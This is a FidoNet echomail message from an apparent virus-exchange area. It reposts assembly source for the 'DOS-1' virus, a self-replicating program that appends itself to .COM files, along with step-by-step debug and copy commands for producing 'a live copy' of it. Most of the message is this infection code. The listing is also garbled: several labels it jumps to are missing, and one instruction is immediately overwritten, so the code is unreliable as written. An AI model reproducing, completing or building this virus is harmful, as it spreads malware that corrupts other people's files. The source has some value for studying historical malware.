; Msg  : 17 of 54
; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:12
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : DOS_1.ASM
;.RealName: Max Ivanov
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:35)
;* To   : Mark Hapershaw
;* Subj : DOS_1.ASM
;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org
;DOS1 virus by the TridenT research group - Direct Action appending .COM

;This virus infects .COM files in the current directory using FCB's.
;Other than FCB use, the virus is VERY simple.  Avoids infecting misnamed
;EXE files by using an 'M' at the beginning of files to mark infection.

;This virus requires a stub file made from the following debug script,
;to make it, compile the virus, then create the stub file by removing the
;semicolons from the code between the lines, saving it, and calling it
;vstub.hex.  Then use the following commands:

;               Debug <vstub.hex
;               Copy /b vstub.com+dos1.com virus.com

;And you will have a live copy of the DOS-1 virus.  Please be careful
;with it and do not release it.

;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[Begin Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=
;e100 4d eb 6 90 90
;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[End Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=

;Disassembly by Black Wolf

.model tiny
        org     100h
        dec     bp
        int     20h

HostFile:       ;Not present to preserve original compiler offsets.....

        call    GetOffset
db              'DOS-1',0

        pop     si
        sub     si,offset Displacement-start

        mov     di,100h
        push    di                      ;Push DI on stack for ret...

        push    si                      ;Restore host file...

        pop     si
        lea     dx,[si+VirusDTA-start]  ;set DS:DX = DTA
        call    SetDTA
        mov     ax,1100h                ;Find first filename w/FCB's

        lea     dx,[si+SearchString-start]
        int     21h                       ;Find first/next filename
                          ;using FCB's (*.COM)

        or      al,al                   ;Were any .COM files found?
        jnz     ResetDTA                ;No.... exit virus.

        lea     dx,[si+VirusDTA-start]
        mov     ah,0fh
        int     21h                     ;open .COM file w/FCB

        or      al,al                   ;Successful?
        jnz     FindNextFile            ;No - find another.

        push    dx                      ;Push offset of DTA

        mov     di,dx

        mov     word ptr [di+0Eh],1  ;Set bytes per record to 1
        xor     ax,ax
        mov     [di+21h],ax          ;Set Random Record Num to 0
        mov     [di+23h],ax          ;?

        lea     dx,[si]
        call    SetDTA               ;Set DTA to just before virus
                         ;code in memory - Storage bytes..

        lea     dx,[di]              ;DX = Virus DTA
        mov     ah,27h
        mov     cx,4
        int     21h                  ;Read first 4 bytes w/FCB

        cmp     byte ptr [si],'M'    ;Is it an EXE file or infected?
        je      CloseFile            ;exit...

        mov     ax,[di+10h]          ;AX = Filesize
        mov     [di+21h],ax          ;Set current record to EOF

        cmp     ax,0F800h            ;Is file above F800h bytes?
        ja      CloseFile            ;Too large, exit

        push    ax
        lea     dx,[si]
        call    SetDTA               ;Set DTA to storage bytes/virus.

        lea     dx,[di]
        mov     ah,28h
        mov     cx,end_virus-start
        int     21h                  ;Write virus to end of file.

        xor     ax,ax
        mov     [di+21h],ax          ;Reset file to beginning.
        lea     di,[si]              ;Point DI to DTA

        mov     ax,0E94Dh            ;4dh E9h = marker and jump
        pop     ax                   ;AX = jump size
        stosw                        ;Put marker and jump into DTA

        push    dx
        lea     dx,[si]
        call    SetDTA               ;Set DTA for write

        pop     dx
        mov     ah,28h
        mov     cx,4
        int     21h                 ;Write in ID byte 'M' and jump

        pop     dx

        call    SetDTA
        mov     ah,10h
        int     21h                     ;Close file w/FCB

        mov     ah,12h
        jmp     short FindFirstNext     ;Find next file...

        mov     dx,80h                  ;80h = default DTA
        call    SetDTA

        mov     ah,1Ah
        int     21h                     ;Set DTA to DS:DX

        db       'MK'                   ;Musad Khafir's signature

        db       0                      ;Default Drive
        db       '????????COM'          ;Search for all .COM files.

        org 1d1h
end     start

;-+-  FMail 0.96â
; + Origin: The Hamburger Haven 1-318-478-9940 (2:283/718)
;Yoo-hooo-oo, -!
;    þ The MeÂeO
;Trubo Link  Version 4.0 Copyright (c) 1991 Bugland International
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)